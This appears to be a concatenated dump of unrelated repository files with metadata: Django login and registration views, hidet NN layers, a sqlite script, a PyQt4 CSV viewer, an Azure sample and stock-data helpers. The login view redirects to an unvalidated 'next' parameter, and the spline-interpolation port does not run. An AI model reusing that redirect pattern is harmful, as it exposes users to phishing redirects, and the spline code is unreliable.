b3cb85f8e762425f2b99a69cc6f22debaafbd7aa | c4cbbe0823eec6d14d42922d4ef5a0046ca582df | /Product/urls.py | 4abcc9fac07f161a52795e87ff54d6f0144ab3c4 | [] | no_license | shakil102030/RestApiProject | 36cffeaaee9cff1ce7fe049639ff8ef28ba6ae11 | 50a5516907422eb3e6885668ad558e635d942f54 | refs/heads/main | 2023-07-04T18:05:51.450512 | 2021-08-23T13:25:37 | 2021-08-23T13:26:38 | 399,112,571 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 501 | py | from rest_framework import routers
from django.urls import path, include
from . import views
# NOTE(review): the router is created but never registered or included below.
router = routers.DefaultRouter()
#router.register(r'', views.CategoryViewSet)

urlpatterns = [
    #path('categorygf', include(router.urls))
    path("categories", views.CategoryListAPIView.as_view()),
    path("Food", views.FoodListAPIView.as_view()),
    path("latest", views.LatestFoodsListAPIView.as_view()),
    # Detail view addressed by category slug and food slug.
    path('<slug:category_slug>/<slug:Food_slug>/', views.FoodDetailAPIView.as_view()),
]
| [
"shakilahmmed165@gmail.com"
] | shakilahmmed165@gmail.com |
c86c98ae72815124b24d3ae32ec5d6a1d90a7dca | 324d9bc6747873173cf457d563665f59005c0efc | /apps/users/views.py | ff8c38e6a8d915aa28bdd5f5db1eb3e22a995a8c | [] | no_license | jzxyouok/movie-1 | fd220618ce8c03bc3dc33d5b39a81547097653b2 | 650c05389aaefb84544d2246bf8436bed7157547 | refs/heads/master | 2020-06-03T16:00:01.479269 | 2018-05-30T09:22:43 | 2018-05-30T09:22:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,829 | py | from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render
from django.urls import reverse
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.hashers import make_password
from django.views.generic.base import View
from django.contrib.auth.backends import ModelBackend
from .models import UserProfile, EmailVerifyRecord
import json
from django.db.models import Q # 并集
from .forms import LoginForm, RegisterForm, ResetPwdForm, UserInfoForm, UploadImageForm, ForgetPwdForm
from apps.utils.email_send import send_register_email
# Create your views here.
class CustomBackend(ModelBackend):
    """
    Override ModelBackend.authenticate so users can log in with either
    their username or their e-mail address.
    """
    def authenticate(self, request, username=None, password=None, **kwargs):
        try:
            # Q(...) | Q(...) is a union: match on username OR e-mail.
            user = UserProfile.objects.get(Q(username=username) | Q(email=username))
            if user.check_password(password):
                return user
        except Exception as e:
            # Any lookup failure (no match, multiple matches) -> authentication fails.
            return None
class LoginView(View):
    # Implement get() directly so no extra method-dispatch check is needed.
    def get(self, request):
        redirect_url = request.GET.get('next', '')
        return render(request, "users/login.html", {
            "redirect_url": redirect_url
        })

    def post(self, request):
        login_form = LoginForm(request.POST)
        # is_valid() runs the form's field validation; on failure fall through
        # and re-render the login page with the bound form.
        if login_form.is_valid():
            # Empty string when missing; keys match the form field names.
            user_name = request.POST.get("username", "")
            pass_word = request.POST.get("password", "")
            # authenticate() returns the user object on success, None on failure.
            user = authenticate(username=user_name, password=pass_word)
            if user is not None:
                # Only activated (e-mail verified) accounts may log in.
                if user.is_active:
                    login(request, user)
                    redirect_url = request.POST.get('next', '')
                    if redirect_url:
                        return HttpResponseRedirect(redirect_url)
                    return HttpResponseRedirect(reverse("index"))
                else:
                    # Account exists but has not been activated yet.
                    return render(
                        request, "users/login.html", {
                            "msg": "用户名未激活! 请前往邮箱进行激活"})
            # Wrong username or password.
            else:
                return render(request, "users/login.html", {"msg": "用户名或密码错误!"})
        # Form validation failed: redisplay the form with its errors.
        else:
            return render(
                request, "users/login.html", {
                    "login_form": login_form})
class ActiveUserView(View):
    """
    Activate a newly registered user via the e-mailed verification code.
    """
    def get(self, request, active_code):
        # Look up the e-mail verification record(s) for this code.
        all_record = EmailVerifyRecord.objects.filter(code=active_code)
        if all_record:
            for record in all_record:
                # Activate the account tied to the recorded e-mail address.
                email = record.email
                user = UserProfile.objects.get(email=email)
                user.is_active = True
                user.save()
        else:
            return render(request, 'users/active_fail.html')
        return render(request, 'users/login.html')
class RegisterView(View):
    """
    Registration view.
    """
    def get(self, request):
        register_form = RegisterForm()
        return render(request, "users/register.html", {'register_form': register_form})

    def post(self, request):
        # Bind the submitted data to the registration form.
        register_form = RegisterForm(request.POST)
        if register_form.is_valid():
            user_name = request.POST.get('email', None)
            # Reject duplicate accounts (e-mail doubles as the username).
            if UserProfile.objects.filter(email=user_name):
                return render(request, 'users/register.html',
                              {'register_form': register_form, 'msg': '用户已经存在'})
            pass_word = request.POST.get('password', None)
            # Build the profile record.
            user_profile = UserProfile()
            user_profile.username = user_name
            user_profile.email = user_name
            # New accounts start inactive until e-mail confirmation.
            user_profile.is_active = False
            # Store only the hashed password.
            user_profile.password = make_password(pass_word)
            user_profile.save()
            send_register_email(user_name, 'register')
            messages.success(request, "已经发送了激活邮件,请查收")
            return render(request, 'users/register.html')
        else:
            return render(request, 'users/register.html', {'register_form': register_form})
class ResetPwdView(View):
    """
    Change-password view for an already identified user.
    """
    def post(self, request):
        reset_form = ResetPwdForm(request.POST)
        if reset_form.is_valid():
            username = request.user.username
            password1 = request.POST.get('password1', '')
            password2 = request.POST.get('password2', '')
            # The two entries must match before anything is saved.
            if password1 != password2:
                return render(request, 'users/reset.html', {'msg': '两次输入的密码不一致'})
            user = UserProfile.objects.get(username=username)
            user.password = make_password(password2)
            user.save()
            return render(request, 'users/login.html', {'msg': '密码修改成功,请使用新密码登录'})
        else:
            # Form invalid (e.g. password too short).
            return render(request, 'users/reset.html', {'reset_form': reset_form})
class UserInfoView(LoginRequiredMixin, View):
    """
    User-centre view; requires an authenticated user.
    """
    login_url = '/login/'
    redirect_field_name = 'next'

    def get(self, request):
        return render(request, 'users/user.html')

    def post(self, request):
        # Bind to the existing user via `instance` so this is an update, not a create.
        user_info_form = UserInfoForm(request.POST, instance=request.user)
        if user_info_form.is_valid():
            user = UserProfile.objects.get(pk=request.user.id)
            user.nick_name = user_info_form.cleaned_data['nick_name']
            user.gender = user_info_form.cleaned_data['gender']
            user.sign = user_info_form.cleaned_data['sign']
            user.address = user_info_form.cleaned_data['address']
            user.mobile = user_info_form.cleaned_data['mobile']
            user.save()
            return HttpResponseRedirect(reverse('user_info'))
        else:
            # Serialise the form-error dict to a JSON string via json.dumps.
            return HttpResponse(
                json.dumps(user_info_form.errors),
                content_type='application/json'
            )
class UploadImageView(LoginRequiredMixin, View):
    """
    Avatar (profile image) upload view.
    """
    def post(self, request):
        # request.FILES carries the uploaded image payload.
        image_form = UploadImageForm(request.POST, request.FILES)
        if image_form.is_valid():
            image = image_form.cleaned_data['image']
            request.user.image = image
            request.user.save()
            # return HttpResponse('{"status": "success"}', content_type='application/json')
            return HttpResponseRedirect(reverse('user_info'))
        else:
            return HttpResponse('{"status": "fail"}', content_type='application/json')
class ForgetPwdView(View):
    """
    Password-recovery view: e-mails a reset link to the given address.
    """
    def get(self, request):
        forget_form = ForgetPwdForm()
        return render(request, 'users/forgetpwd.html', {'forget_form': forget_form})

    def post(self, request):
        forget_form = ForgetPwdForm(request.POST)
        if forget_form.is_valid():
            email = request.POST.get('email', None)
            send_register_email(email, 'forget')
            return render(request, 'index.html')
        else:
            return render(request, 'users/forgetpwd.html', {'forget_form': forget_form})
class ResetView(View):
    # Resolve a reset code back to its e-mail and show the reset form.
    def get(self, request, active_code):
        all_records = EmailVerifyRecord.objects.filter(code=active_code)
        if all_records:
            for record in all_records:
                email = record.email
                # Returns on the first matching record.
                return render(request, "users/reset.html", {"email": email})
        else:
            return render(request, "users/active_fail.html")
        # NOTE(review): only reached when all_records is non-empty but the loop
        # body never runs -- effectively dead code for a non-empty queryset.
        return render(request, "users/login.html")
class LogOutView(View):
    """
    Log the user out and redirect to the index page.
    """
    def get(self, request):
        logout(request)
        return HttpResponseRedirect(reverse('index'))
| [
"18778335525@163.com"
] | 18778335525@163.com |
acba31f7ed54309ed5f26550cbdff2ef54d18d26 | 37b9a6558e61a5a4ebe49b55a68bd3c9785b1f52 | /accounts/signals.py | ed79c66f34a9ce087898e65cf72dfaf450abb75c | [] | no_license | reemsamir1999/DjangoRest-Lab-ITI | 5d493bbb671319975d4303863507fd3d8800bf74 | 1f6dfd95682eca4ff1ba0cc633c278dc6d3ece08 | refs/heads/main | 2023-08-26T05:47:44.046912 | 2021-11-13T17:08:30 | 2021-11-13T17:08:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 365 | py | from django.db.models import signals
from django.dispatch import receiver
from django.contrib.auth.models import User
from rest_framework.authtoken.models import Token
from django.db.models.signals import post_save
@receiver(post_save, sender=User)
def user_created(sender, instance, created, **kwargs):
if created:
Token.objects.create(user=instance) | [
"reemsamir521999@gmail.com"
] | reemsamir521999@gmail.com |
4b3999bceb135ae43088f2acd45fd813a32aa724 | 330899fd4a9653e05e2a09e0a4f30c119af97ad4 | /python/hidet/tos/modules/nn.py | 3d1c65c10d426d6b2298130ea875a54bbf014694 | [
"Apache-2.0"
] | permissive | yaoyaoding/hidet-artifacts | f8a4707c7fc28aa7bfa4dab3a9f2a9387c020f99 | f2e9767bb2464bd0592a8ec0b276f97481f13df2 | refs/heads/main | 2023-04-30T13:12:57.350002 | 2023-04-24T19:37:34 | 2023-04-24T19:37:34 | 551,692,225 | 3 | 1 | Apache-2.0 | 2022-11-01T23:25:17 | 2022-10-14T22:40:28 | Python | UTF-8 | Python | false | false | 5,063 | py | from typing import Optional, Union, List
import math
from hidet.tos import ops
from hidet.tos.common import normalize
from hidet.tos.module import Module, Tensor
from hidet.tos.tensor import randn, zeros, ones
from hidet.tos.modules.container import Sequential, ModuleList
class Conv2d(Module):
    # 2-D convolution; zero padding is applied explicitly in forward() via ops.pad.
    def __init__(self, in_channels, out_channels, kernel_size, padding=0, stride=1, groups=1):
        super().__init__()
        self.in_channels = in_channels
        self.out_channels = out_channels
        # normalize(...) expands scalars into per-dimension tuples.
        self.kernel = normalize(kernel_size)
        self.padding = normalize(padding)
        self.stride = normalize(stride)
        self.groups = groups
        # Weight init: N(0, 1/sqrt(out_channels)) -- NOTE(review): fan-in based
        # scaling is the more common choice; confirm this is intentional.
        self.weight = randn(shape=[out_channels, in_channels, *self.kernel], dtype='float32', stddev=1.0 / math.sqrt(out_channels))

    def extra_str(self) -> str:
        return 'in_channels={}, out_channels={}, kernel_size={}, stride={}, padding={}'.format(self.in_channels, self.out_channels, self.kernel, self.stride, self.padding)

    def forward(self, x):
        # Pad first, then run the convolution without implicit padding.
        x = ops.pad(x, ops.utils.normalize_padding(self.padding))
        return ops.conv2d(x, self.weight, self.stride, self.groups)
class BatchNorm2d(Module):
    # Inference-only batch norm: normalises with stored running statistics;
    # no affine (gamma/beta) parameters.
    def __init__(self, num_features, eps=1e-5):
        super().__init__()
        self.eps = eps
        self.running_mean = zeros(shape=[num_features])
        self.running_var = ones(shape=[num_features])

    def extra_str(self) -> str:
        return 'eps={}'.format(self.eps)

    def forward(self, x: Tensor):
        return ops.batch_norm_infer(x, self.running_mean, self.running_var, self.eps)
class Linear(Module):
    """Fully-connected layer computing y = x @ W (+ b); weight stored as [in, out]."""
    def __init__(self, in_features, out_features, bias: bool = True):
        super().__init__()
        self.in_features = in_features
        self.out_features = out_features
        self.weight = randn(shape=[in_features, out_features], stddev=1.0 / math.sqrt(in_features))
        if bias:
            self.bias = zeros(shape=[out_features])
        else:
            self.bias = None

    def extra_str(self) -> str:
        return 'in_features={}, out_features={}'.format(self.in_features, self.out_features)

    def forward(self, x: Tensor) -> Tensor:
        # Fix: the original unconditionally evaluated `matmul(...) + self.bias`,
        # which adds None when the layer was constructed with bias=False.
        out = ops.matmul(x, self.weight)
        if self.bias is not None:
            out = out + self.bias
        return out
class Relu(Module):
    # Elementwise rectified linear unit.
    def forward(self, x):
        return ops.relu(x)
class MaxPool2d(Module):
    # 2-D max pooling; kernel/stride/padding are forwarded to ops.max_pool2d as given.
    def __init__(self, kernel_size, stride=1, padding=0):
        super().__init__()
        self.kernel = kernel_size
        self.stride = stride
        self.padding = padding

    def extra_str(self) -> str:
        return 'kernel_size={}, stride={}, padding={}'.format(self.kernel, self.stride, self.padding)

    def forward(self, x):
        return ops.max_pool2d(x, self.kernel, self.stride, self.padding)
class AvgPool2d(Module):
    # 2-D average pooling; unlike MaxPool2d all three arguments are required.
    def __init__(self, kernel_size, stride, padding):
        super().__init__()
        self.kernel = kernel_size
        self.stride = stride
        self.padding = padding

    def extra_str(self) -> str:
        return 'kernel_size={}, stride={}, padding={}'.format(self.kernel, self.stride, self.padding)

    def forward(self, x):
        return ops.avg_pool2d(x, self.kernel, self.stride, self.padding)
class AdaptiveAvgPool2d(Module):
    # Adaptive average pooling; only global pooling (output size 1x1) is
    # supported, realised as an average pool over the full spatial extent.
    def __init__(self, output_size):
        super().__init__()
        self.output_size = normalize(output_size)
        assert tuple(self.output_size) == (1, 1), 'current only support this'

    def extra_str(self) -> str:
        return 'output_size={}'.format(self.output_size)

    def forward(self, x: Tensor) -> Tensor:
        # Pool over the whole h x w plane -> spatial output (1, 1).
        n, c, h, w = x.shape
        return ops.avg_pool2d(x, kernel=(h, w), stride=(1, 1), padding=(0, 0))
class Embedding(Module):
    # Lookup table: rows of `weight` selected by integer indices.
    def __init__(self, num_embeddings: int, embedding_dim: int):
        super().__init__()
        self.num_embeddings = num_embeddings
        self.embedding_dim = embedding_dim
        # N(0, 1) initialised table, one row per embedding id.
        self.weight = randn(shape=[num_embeddings, embedding_dim], dtype='float32', mean=0.0, stddev=1.0)

    def forward(self, indices: Tensor) -> Tensor:
        return ops.take(self.weight, indices, axis=0)
class LayerNorm(Module):
    """Layer normalization over *normalized_shape*, with optional affine scale/shift."""
    def __init__(self, normalized_shape: Union[int, List[int]], eps: float = 1e-5, elementwise_affine: bool = True):
        super().__init__()
        if isinstance(normalized_shape, int):
            normalized_shape = (normalized_shape,)
        self.normalized_shape = tuple(normalized_shape)
        # NOTE(review): eps is stored but never forwarded to ops.layer_norm -- confirm.
        self.eps = eps
        self.elementwise_affine = elementwise_affine
        if elementwise_affine:
            self.weight = ones(normalized_shape)
            self.bias = zeros(normalized_shape)
        else:
            self.weight = None
            self.bias = None

    def forward(self, x: Tensor) -> Tensor:
        x = ops.layer_norm(x)
        # Fix: the attributes are Tensor-or-None, so test identity against None
        # explicitly; truth-testing a Tensor (`if self.weight:`) is ambiguous.
        if self.weight is not None:
            x = x * self.weight
        if self.bias is not None:
            x = x + self.bias
        return x
class Gelu(Module):
    # Exact (erf-based) GELU: x * 0.5 * (1 + erf(x / sqrt(2)));
    # 1.4142135381698608 is sqrt(2) at float32 precision.
    def forward(self, x):
        return x * (ops.erf(x * (1.0 / 1.4142135381698608)) + 1.0) * 0.5
class Tanh(Module):
    # Elementwise hyperbolic tangent.
    def forward(self, x):
        return ops.tanh(x)
| [
"dingyaoyao.cs@gmail.com"
] | dingyaoyao.cs@gmail.com |
5ee1c1836ae680d8569f59bc57ec21d2b1998ea4 | e9163cb33f6cd1a898884bd2c6144c28a8c156bd | /sql/sqli.py | 94e77ae81f79bd73fee2cd170b459ebe39cc1c71 | [] | no_license | SimoCi/RealPython2 | 73d5bea10a2021d161a8699a303fb8fcad59a486 | ddf0ea2e689bb73a171aafc7cfa9d47702846b09 | refs/heads/master | 2021-01-02T08:10:05.082573 | 2014-11-05T14:05:24 | 2014-11-05T14:05:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 693 | py | import sqlite3
with sqlite3.connect("new.db") as conn:
crs = conn.cursor()
cities = [
('Boston', 'MA', 600000),
('Los Angeles', 'CA', 38000000),
('Houston', 'TX', 2100000),
('Philadelphia', 'PA', 1500000),
('San Antonio', 'TX', 1400000),
('San Diego', 'CA', 130000),
('Dallas', 'TX', 1200000),
('San Jose', 'CA', 900000),
('Jacksonville', 'FL', 800000),
('Indianapolis', 'IN', 800000),
('Austin', 'TX', 800000),
('Detroit', 'MI', 700000)
]
crs.executemany("INSERT into populations VALUES (?,?,?)", cities)
crs.execute("SELECT * FROM populations WHERE population > 1000000")
rows = crs.fetchall()
for r in rows:
print r[0], r[1], r[2] | [
"simonecidesk@gmail.com"
] | simonecidesk@gmail.com |
eca4f2b0434e257082837eb9629ff0e723bcea9f | 6c05ce7733b3c6839a0d650d1168233650b4dc6f | /PythonLibrary/spline_inverse/InterpolateCurve.py | c2a0b3eae0b82a133a45341e9c149dd7016d9f87 | [] | no_license | jessdtate/FwdInvToolkit | 7efb0836ecaaf5327023b94a78bb3ca5584b390e | 861824224c30882f7bf56d1abe0717621c0dafa9 | refs/heads/master | 2021-01-15T17:46:05.957770 | 2017-09-15T16:51:35 | 2017-09-15T16:51:35 | 38,811,038 | 1 | 0 | null | 2017-09-15T07:35:50 | 2015-07-09T09:21:56 | Matlab | UTF-8 | Python | false | false | 3,171 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Jul 20 09:45:02 2016
@author: andrewcorbato
"""
def InterpolateCurve(CurveParameters,InterpolationDensity,varargin):
    # author: Burak Erem
    # input: varargin should be a list
    # NOTE(review): this MATLAB port is broken as written -- it contains a
    # SyntaxError (call-style assignment below), references the undefined
    # names `numel_dims`, `splinematrix` and `tensorRightMatrixMultiply`,
    # and indexes [1] into 1-element shape tuples. Nesting below is a
    # best-effort reconstruction (indentation was lost); verify before use.
    import numpy as np
    # check type of varargin
    if type(varargin) != type([]):
        varargin = list(varargin)
        if type(varargin) != type([]):
            import sys
            sys.exit('ERROR: varargin must be a python list or compatible w/ list().')
    # input sizes and number of elements
    dims_CurveParameters = np.shape(CurveParameters)
    prod_dims_CurveParameters = np.prod(dims_CurveParameters,axis=0)
    dims_dims_CurveParameters = np.shape(dims_CurveParameters)
    # NOTE(review): np.shape of a shape-tuple is 1-D, so [1] raises IndexError;
    # probably len(dims_CurveParameters) was intended -- TODO confirm.
    numel_dims_dims = dims_dims_CurveParameters[0]*dims_dims_CurveParameters[1]
    PeriodicityFlag = np.zeros((numel_dims_dims-1,1))
    numel_varg = len(varargin)
    if numel_varg > 0:
        p = 'periodic'
        for ii in range(0,numel_varg,1):
            if varargin[ii].lower() == p:
                # unless this is followed by a numeric array of dimension
                # indices that should be periodic,
                # assume they are all periodic
                if numel_varg > ii:
                    if type(varargin[ii+1]) != type(p):
                        # NOTE(review): SyntaxError -- MATLAB call-style indexing;
                        # should presumably be PeriodicityFlag[varargin[ii+1]] = 1
                        PeriodicityFlag(varargin[ii+1]) = 1
        dims_PeriodicityFlag = np.shape(PeriodicityFlag)
        numel_PeriodicityFlag = dims_PeriodicityFlag[0]*dims_PeriodicityFlag[1]
        # NOTE(review): `numel_dims` is undefined (NameError);
        # numel_dims_dims looks like the intended name -- TODO confirm.
        if numel_PeriodicityFlag > (numel_dims - 1):
            print('WARNING: Dimensions specified as being periodic \
exceed input dimensions. \n')
        else:
            PeriodicityFlag = np.ones((dims_PeriodicityFlag[0],dims_PeriodicityFlag[1]))
    # Form 1-D spline interpolation matrices of appropriate sizes
    # TensorEdgeDimensions = np.sort(np.unique(dims_CurveParameters[2,-1]))
    # for jj = TensorEdgeDimensions
    # SplineMatrix[i-2]=np.transpose(splineMatrix(i-2,1,InterpolationDensity))
    TensorEdgeDimensions = dims_CurveParameters[1:-1]
    dims_TensorEdgeDimensions = np.shape(TensorEdgeDimensions)
    numel_Tensor = dims_TensorEdgeDimensions[0]*dims_TensorEdgeDimensions[1]
    SplineMatrix = [None]*numel_Tensor
    for jj in range(0,numel_Tensor,1):
        if PeriodicityFlag[jj] == 0: # if not periodic
            SplineMatrix[jj] = np.transpose(splinematrix(TensorEdgeDimensions[jj]-2,1,InterpolationDensity))
        else: # if periodic
            SplineMatrix[jj] = np.transpose(splinematrix(TensorEdgeDimensions[jj]-2,1,InterpolationDensity,'Periodic'))
    # intialize interpolated curves as curve parameters
    InterpolatedCurve = CurveParameters
    # Interpolate spline curves using tensor-matrix "right" multiplication, for
    # all the "right-hand" sides (i.e. tensor indices, not including the first one)
    for kk in range(0,(numel_dims_dims-1),1):
        InterpolatedCurve = tensorRightMatrixMultiply(InterpolatedCurve,kk,SplineMatrix[kk])
    return InterpolatedCurve
| [
"noreply@github.com"
] | jessdtate.noreply@github.com |
794362f36d7dd92514eab05c05e9543d1f388498 | 22dcb4b838b4d9b30db2c294600e509dd9399685 | /0511/abridgement_practice.py | b16b3abbc93ec8fd0b99c1035b2089718db8b2ce | [] | no_license | KuboIroha/PythonPractice | 0a761776adf319a8fa08ea88f07efcca9c09bc16 | 406fa7b5dc1730974e783aaba19d37f632995cf7 | refs/heads/master | 2023-05-01T03:35:37.317227 | 2021-05-23T08:38:03 | 2021-05-23T08:38:03 | 366,095,855 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 182 | py | #coding UTF-8
# Augmented-assignment practice script.
x=10
print(x)
# addition
x += 10
print(x)
# subtraction
x -= 10
print(x)
# multiplication
x *= 10
print(x)
# division (true division: x becomes a float here)
x /= 10
print(x)
# remainder
x %= 10
print(x) | [
"bjik1290502@gn.iwasaki.ac.jp"
] | bjik1290502@gn.iwasaki.ac.jp |
a3b7d2043d073baae61c82a62a7baf513e5463d4 | 117aaf186609e48230bff9f4f4e96546d3484963 | /others/FilterTable/main.py | c18d99d897d4e53baba8675c35fbb4fd3a1f0667 | [
"MIT"
] | permissive | eyllanesc/stackoverflow | 8d1c4b075e578496ea8deecbb78ef0e08bcc092e | db738fbe10e8573b324d1f86e9add314f02c884d | refs/heads/master | 2022-08-19T22:23:34.697232 | 2022-08-10T20:59:17 | 2022-08-10T20:59:17 | 76,124,222 | 355 | 433 | MIT | 2022-08-10T20:59:18 | 2016-12-10T16:29:34 | C++ | UTF-8 | Python | false | false | 1,326 | py | import csv
import sys
from PyQt4 import QtGui
from PyQt4 import uic
from PyQt4.QtCore import QString
from PyQt4.QtGui import QTableWidgetItem
filter_class = uic.loadUiType("filter.ui")[0]
class Filter_window(QtGui.QWidget, filter_class):
    # Python 2 / PyQt4 widget that fills a table from Rts.csv on construction.
    def __init__(self, parent=None, *args, **kwargs):
        # NOTE(review): calls QMainWindow.__init__ although the class derives
        # from QWidget -- confirm this mismatch is intentional.
        QtGui.QMainWindow.__init__(self, parent)
        self.setupUi(self)
        self.loadAll()

    def loadAll(self):
        # Read the whole CSV (header + rows) and mirror it into the table widget.
        with open("Rts.csv", "rb") as inpfil:
            reader = csv.reader(inpfil, delimiter=',')
            csheader = reader.next()
            ncol = len(csheader)
            data = list(reader)
            row_count = len(data)
            self.filterall.setRowCount(row_count)
            self.filterall.setColumnCount(ncol)
            # Header labels come straight from the CSV header row.
            self.filterall.setHorizontalHeaderLabels(QString('%s' % ', '.join(map(str, csheader))).split(","))
            for ii in range(0, row_count):
                # NOTE(review): the prints below look like leftover debug output.
                print data[ii]
                mainins = data[ii]
                print mainins
                for var in range(0, ncol):
                    print mainins[var], "\n"
                    self.filterall.setItem(ii, var, QTableWidgetItem(mainins[var]))
if __name__ == '__main__':
    # Standard Qt bootstrap: build the app, show the window, enter the event loop.
    app = QtGui.QApplication(sys.argv)
    filterwin = Filter_window()
    filterwin.show()
    sys.exit(app.exec_())
| [
"e.yllanescucho@gmail.com"
] | e.yllanescucho@gmail.com |
240e6d72e883cd5d44adc7bc87f9e6646c36762c | aa0270b351402e421631ebc8b51e528448302fab | /sdk/paloaltonetworks/azure-mgmt-paloaltonetworksngfw/generated_samples/post_rules_delete_minimum_set_gen.py | 37e8eb6f0bb63131b561033cfb6c8b88a6e137ab | [
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] | permissive | fangchen0601/azure-sdk-for-python | d04a22109d0ff8ff209c82e4154b7169b6cb2e53 | c2e11d6682e368b2f062e714490d2de42e1fed36 | refs/heads/master | 2023-05-11T16:53:26.317418 | 2023-05-04T20:02:16 | 2023-05-04T20:02:16 | 300,440,803 | 0 | 0 | MIT | 2020-10-16T18:45:29 | 2020-10-01T22:27:56 | null | UTF-8 | Python | false | false | 1,613 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.paloaltonetworks import PaloAltoNetworksNgfwMgmtClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-paloaltonetworks
# USAGE
python post_rules_delete_minimum_set_gen.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
    # Auto-generated Azure SDK sample (see header): deletes post-rule priority 1
    # on global rulestack "lrs1".
    # DefaultAzureCredential reads AZURE_CLIENT_ID / AZURE_TENANT_ID /
    # AZURE_CLIENT_SECRET from the environment (see module docstring).
    client = PaloAltoNetworksNgfwMgmtClient(
        credential=DefaultAzureCredential(),
        subscription_id="SUBSCRIPTION_ID",
    )
    # begin_delete returns a poller; .result() blocks until the LRO completes.
    response = client.post_rules.begin_delete(
        global_rulestack_name="lrs1",
        priority="1",
    ).result()
    print(response)
# x-ms-original-file: specification/paloaltonetworks/resource-manager/PaloAltoNetworks.Cloudngfw/preview/2022-08-29-preview/examples/PostRules_Delete_MinimumSet_Gen.json
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | fangchen0601.noreply@github.com |
9a05bb883ba068c5b2d77669562c68b4b2037e4b | 9d2d6b29662ee32dfaef72504cc85981f29b5fca | /volat.py | 6fe5fee87019a4ae22e903cdb5163b91378e111a | [] | no_license | jingmouren/Volatility-Prediction | 63e9ed1705e23330a34e3bb4bf5091b1f680cff2 | 36d1dd79ffa8f2af6baed12f81b6003c58aea4c4 | refs/heads/main | 2023-08-26T06:51:43.204776 | 2021-10-31T17:01:51 | 2021-10-31T17:01:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,592 | py | # The function below takes the file name corresponding to a stock and returns the stock_id
def stock_id(name):
    """Extract the numeric stock id embedded in a stock file name/path.

    Fix: the original crashed with an opaque AttributeError (`.group` on None)
    for names without digits; raise a clear ValueError instead.
    """
    import re
    match = re.search(r'\d+', name)
    if match is None:
        raise ValueError('no stock id digits found in %r' % name)
    return int(match.group(0))
# The function below takes the path of a folder containing stock files and returns a list of the contained file paths
# sorted by stock_id
def files(folder):
    """Return the paths of all entries directly inside *folder*, ordered by stock id."""
    import glob
    return sorted(glob.glob(folder + '/*'), key=stock_id)
# The function below takes a list of stock files, a number n and a boolean value, and returns the concatenation
# of the n respective dataframes with an additional 'ID' column holding each stock's id. If the boolean value is
# TRUE it uses the first n files; if the boolean value is FALSE it chooses n files at random.
def sub_frame(file_names, number, sequential):
    """Concatenate *number* stock dataframes, each tagged with its stock id.

    Takes the first *number* paths when *sequential* is True, otherwise a
    random sample without replacement.
    """
    import random
    import pandas as pd
    chosen = file_names[0:number] if sequential else random.sample(file_names, number)
    tagged = []
    for path in chosen:
        frame = pd.read_parquet(str(path), engine='auto')
        # NOTE(review): the tag column is named 'ID' here but 'stock_id'
        # elsewhere in this file (e.g. global_random_sample) -- confirm
        # which name downstream consumers expect.
        frame['ID'] = [stock_id(path)] * frame.shape[0]
        tagged.append(frame)
    return pd.concat(tagged)
# The function below takes a stock dataframe and returns the list of row positions of one randomly chosen group.
# By group we mean a set of rows sharing the same time_id. The probability of each group is proportional to its size.
def random_batch(frame):
    """Return the row positions of one randomly chosen time_id group of *frame*.

    A row is drawn uniformly, so each group is picked with probability
    proportional to its size.  The group is then expanded left/right with
    explicit bounds checks, fixing the original out-of-range lookups
    (frame.loc[-1] / frame.loc[n]) that raised KeyError whenever the first
    or last group was drawn.  Assumes a 0..n-1 range index with groups
    stored contiguously.
    """
    import random
    n = frame.shape[0]
    k = random.randrange(n)
    target = frame.loc[k].at["time_id"]
    right_end = k
    while right_end + 1 < n and frame.loc[right_end + 1].at["time_id"] == target:
        right_end = right_end + 1
    left_end = k
    while left_end - 1 >= 0 and frame.loc[left_end - 1].at["time_id"] == target:
        left_end = left_end - 1
    return list(range(left_end, right_end + 1))
# The function below prints a parquet file given it's path.
def parquet_print(filename):
    """Print the dataframe stored in the parquet file at *filename*."""
    import pandas as pd
    print(pd.read_parquet(str(filename), engine='auto'))
# Similarly for csv files
def csv_print(filename):
    """Print the dataframe stored in the csv file at *filename*."""
    import pandas as pd
    print(pd.read_csv(str(filename)))
# The function below returns the dataframe contained in a parquet file given its path.
def parquet_frame(filename):
    """Load the parquet file at *filename* into a pandas dataframe."""
    import pandas as pd
    return pd.read_parquet(str(filename))
#Similarly for csv files
def csv_frame(filename):
    """Load the csv file at *filename* into a pandas dataframe."""
    import pandas as pd
    return pd.read_csv(str(filename))
# The function below takes a stock data frame and a number k and returns the first and last row of the
# time_id-group containing the k_th row
def local_patch(frame, k):
    """Return (time_id, first_row, last_row) for the time_id group containing row *k*.

    Generalized: the original special-cased the dataset-specific sentinel
    time_ids 5 (first group) and 32767 (last group); explicit bounds checks
    give the same result for that data while handling any first/last group
    and avoiding out-of-range .loc lookups.  Assumes a 0..n-1 range index
    with time_id groups stored contiguously.
    """
    n = frame.shape[0]
    time_id = frame.loc[k].at["time_id"]
    right_end = k
    while right_end + 1 < n and frame.loc[right_end + 1].at["time_id"] == time_id:
        right_end = right_end + 1
    left_end = k
    while left_end - 1 >= 0 and frame.loc[left_end - 1].at["time_id"] == time_id:
        left_end = left_end - 1
    return (time_id, left_end, right_end)
